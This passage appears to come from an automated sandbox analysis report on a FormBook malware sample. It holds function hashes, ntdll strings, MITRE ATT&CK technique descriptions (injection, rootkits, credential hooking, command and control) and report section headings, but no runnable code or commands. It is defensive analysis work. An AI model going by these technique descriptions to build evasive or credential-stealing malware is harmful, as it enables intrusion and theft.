Opcode Fuzzy Hash: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
Instruction Fuzzy Hash: 1BE0263464034026D310FB748C13F1277C8AF85B00F4E40B8F548976C3D454E0018210

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 16dd6e19701eb8137eea147804aeefc1d225e4ea9fc13a12949d67fdd6a7e390
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 71D05E756503082AE610AAA59C03F6632886B44B04F490074F948AA3C3D964E4014169

Uniqueness

Uniqueness Score: -1.00%

Function 043E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2C24

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a6a2f60dabd3f2bde2370e4968567ff7be60bf85314520d77d28fc1160b369c
Instruction ID: cad3eeea27c0b071825e3e42b366ee8192a6074e1da1a49e3bfed0bab7bb821c
Opcode Fuzzy Hash: 6a6a2f60dabd3f2bde2370e4968567ff7be60bf85314520d77d28fc1160b369c
Instruction Fuzzy Hash: FAB02B318024C0C5FF04F7204A087173900ABC0300F15D061D3030241E0338D0D0E171

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 043E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 043E293C
___swprintf_l.LIBCMT ref: 043E295E
___swprintf_l.LIBCMT ref: 043E29A3
___swprintf_l.LIBCMT ref: 0441A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0441A527
ffff:, xrefs: 0441A504
::ffff:0:%u.%u.%u.%u, xrefs: 0441A54E
:%u.%u.%u.%u, xrefs: 0441A5B8

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 94aebeb65a99ab1fc2f0d2e1a5c2f83ed26af2e4162a2ef87470757539dd0106
Instruction ID: 1dbb177e1559a3218dc48d093fd9020369bd3f5ec1921f7f284e61772bd69e7d
Opcode Fuzzy Hash: 94aebeb65a99ab1fc2f0d2e1a5c2f83ed26af2e4162a2ef87470757539dd0106
Instruction Fuzzy Hash: DE51E8B6A05126BFDF24DF998C9097FF7BCBB08204714A16AF565D3681D234FE1187A0

Uniqueness

Uniqueness Score: -1.00%

Function 04452410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 044524A6
___swprintf_l.LIBCMT ref: 044524E2
___swprintf_l.LIBCMT ref: 0445257D
___swprintf_l.LIBCMT ref: 044525A3
___swprintf_l.LIBCMT ref: 044525C8
___swprintf_l.LIBCMT ref: 04452608

Strings

ffff:, xrefs: 0445247D, 0445249D
::ffff:0:%u.%u.%u.%u, xrefs: 044524DA
:%u.%u.%u.%u, xrefs: 044525FF
::%hs%u.%u.%u.%u, xrefs: 0445249E

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9b9f3a07e6737343932873abd8541c33ef424cc149b75e584602b0552b7ab3f9
Instruction ID: dac0f62c19a411f252d49ebcc3bc40bc50021aac1b2379df09979ed8b8dea5bd
Opcode Fuzzy Hash: 9b9f3a07e6737343932873abd8541c33ef424cc149b75e584602b0552b7ab3f9
Instruction Fuzzy Hash: 0B51E3B5A04649ABDF34DE5CCD9087FB7F8AB48204B00849BE995D3652E6F4FA008F60

Uniqueness

Uniqueness Score: -1.00%

Function 043D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 04414787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04414725
Execute=1, xrefs: 04414713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04414655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04414742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044146FC
ExecuteOptions, xrefs: 044146A0

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6b51698c5508279e95e47f97a4012f20bb627584054fba9eda3c24b9df9a76fe
Instruction ID: cc9dcf81596c194bea371e55efb0dc722122f1dc956d5f8163bf04beeef97a4c
Opcode Fuzzy Hash: 6b51698c5508279e95e47f97a4012f20bb627584054fba9eda3c24b9df9a76fe
Instruction Fuzzy Hash: 2B5106326002197AFF20AAA5EC85BBA77B8EF08704F5414AAE505A71D1EB71BE458F50

Uniqueness

Uniqueness Score: -1.00%

Function 04476940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 48898205a4d551203b6989e7b77ecca88814dffd0125601efe0bacc7f99e8197
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: D8024671608741AFDB04CF19C490AAFBBE6EFC8714F45892EF9854B260DB31E906CB52

Uniqueness

Uniqueness Score: -1.00%

Function 043EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 043EB6BF

Strings

0, xrefs: 043EB66F
+, xrefs: 043EB65A
0, xrefs: 043EB695
-, xrefs: 043EB650

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 60517030b2ed631f2ce7bbcaa83d98aae60d927ed82132ba1b32269fd122b470
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1B81D070E07269CAEF26CE6AC8517FEFBA1AF45310F18611AD861A77D0C730B841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 044520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0445214F
___swprintf_l.LIBCMT ref: 04452172

Strings

]:%u, xrefs: 04452169
%%%u, xrefs: 04452146
[, xrefs: 0445212B

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 25997812c1da5fd9c4cdb0274dd71bf3e3f938feefda7cb5234d221e06581b78
Instruction ID: b7bcee62738b1a6a39504ff71a897c301c3e08caf4d316480a7dab46fca25330
Opcode Fuzzy Hash: 25997812c1da5fd9c4cdb0274dd71bf3e3f938feefda7cb5234d221e06581b78
Instruction Fuzzy Hash: 8A214FB6A00119ABDF14EEA9DC40ABFB7F8EF58645F040157ED05E3241EB70A9018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 043CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0441031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044102BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044102E7

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4101486b9680120fb3487e111e0bdd772f121362d5c73c115a183ac15f3ff782
Instruction ID: efdfdce6ee1c6d4a2c9af74b09469faef5bbf4aa19aabc89cd7dcfc775f96bc0
Opcode Fuzzy Hash: 4101486b9680120fb3487e111e0bdd772f121362d5c73c115a183ac15f3ff782
Instruction Fuzzy Hash: 73E1AE306047419FEB25CF28C884B2AB7E1AF88314F141A5EF5A58B6E1E775FD45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 043DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 04417B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04417B7F
RTL: Re-Waiting, xrefs: 04417BAC

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e0573f3712c344585605fa120f5f5c0ad730642da0325ae3befb52bc0d65c1a1
Instruction ID: d34976552b9d4bd5d4808fcb411c3f8b971224855650a6724d0e37e37d9d17cc
Opcode Fuzzy Hash: e0573f3712c344585605fa120f5f5c0ad730642da0325ae3befb52bc0d65c1a1
Instruction Fuzzy Hash: 2F41D1327017029FDB24DE25E840B6BB7E9EF88724F101A1EF95A9B790DB31F4058B91

Uniqueness

Uniqueness Score: -1.00%

Function 043DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0441728C

Strings

RTL: Resource at %p, xrefs: 044172A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04417294
RTL: Re-Waiting, xrefs: 044172C1

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1093238b42bc7bd8014f82fb8812cd13dadb81068cf0488ce0d8c2b2be2e5666
Instruction ID: c1ae3cd3ffe04fede361bf828f3f3187898615810558d5b1e7c15505ebe592b8
Opcode Fuzzy Hash: 1093238b42bc7bd8014f82fb8812cd13dadb81068cf0488ce0d8c2b2be2e5666
Instruction Fuzzy Hash: 8341F032700612ABDB20DE25DC41B6AF7A5FF44714F20061AF955AB790DB21F8069BD1

Uniqueness

Uniqueness Score: -1.00%

Function 04452300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0445238D
___swprintf_l.LIBCMT ref: 044523B3

Strings

]:%u, xrefs: 044523AA
%%%u, xrefs: 04452384

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e510d0cfa9df3ed98f6654bedcf284be4c5f54d91cbba3405ae0190d82190521
Instruction ID: 79d8e4dfd4cca54e11d9597a5ca91675cfd56744479521a60168a5c81b5f6ec4
Opcode Fuzzy Hash: e510d0cfa9df3ed98f6654bedcf284be4c5f54d91cbba3405ae0190d82190521
Instruction Fuzzy Hash: D9313072A002299EDF64DE29DC40AAB77A8BF44614F444597EC49E3241EE70BA498FA1

Uniqueness

Uniqueness Score: -1.00%

Function 043E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 043E7E8B

Strings

+, xrefs: 043E7DE8
-, xrefs: 043E7DDD

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 9caeba7805b753a3de68b2836ffaf12169476e868355c7fe47a4d4354aa62971
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 61918570E022269BDF24DF6BC8916BEB7A5FF84720F54651AE855E72C0E730F9428760

Uniqueness

Uniqueness Score: -1.00%

Function 043A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 043A9175
$, xrefs: 043A9191

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: eca10968d3fe48b3be82bb59b6dc329bc7ca367b76158c704ddfbe4fd65a023b
Instruction ID: 0e8e97a28ddeeb1ea8b2866876c68d69a7f1331fdec17591dcf0c8b21cca75c7
Opcode Fuzzy Hash: eca10968d3fe48b3be82bb59b6dc329bc7ca367b76158c704ddfbe4fd65a023b
Instruction Fuzzy Hash: 9B811DB1D002699BDB358B54CC48BEAB6B4AF48714F0045EAA919B7680D770AE95CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GCeHcfCef8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

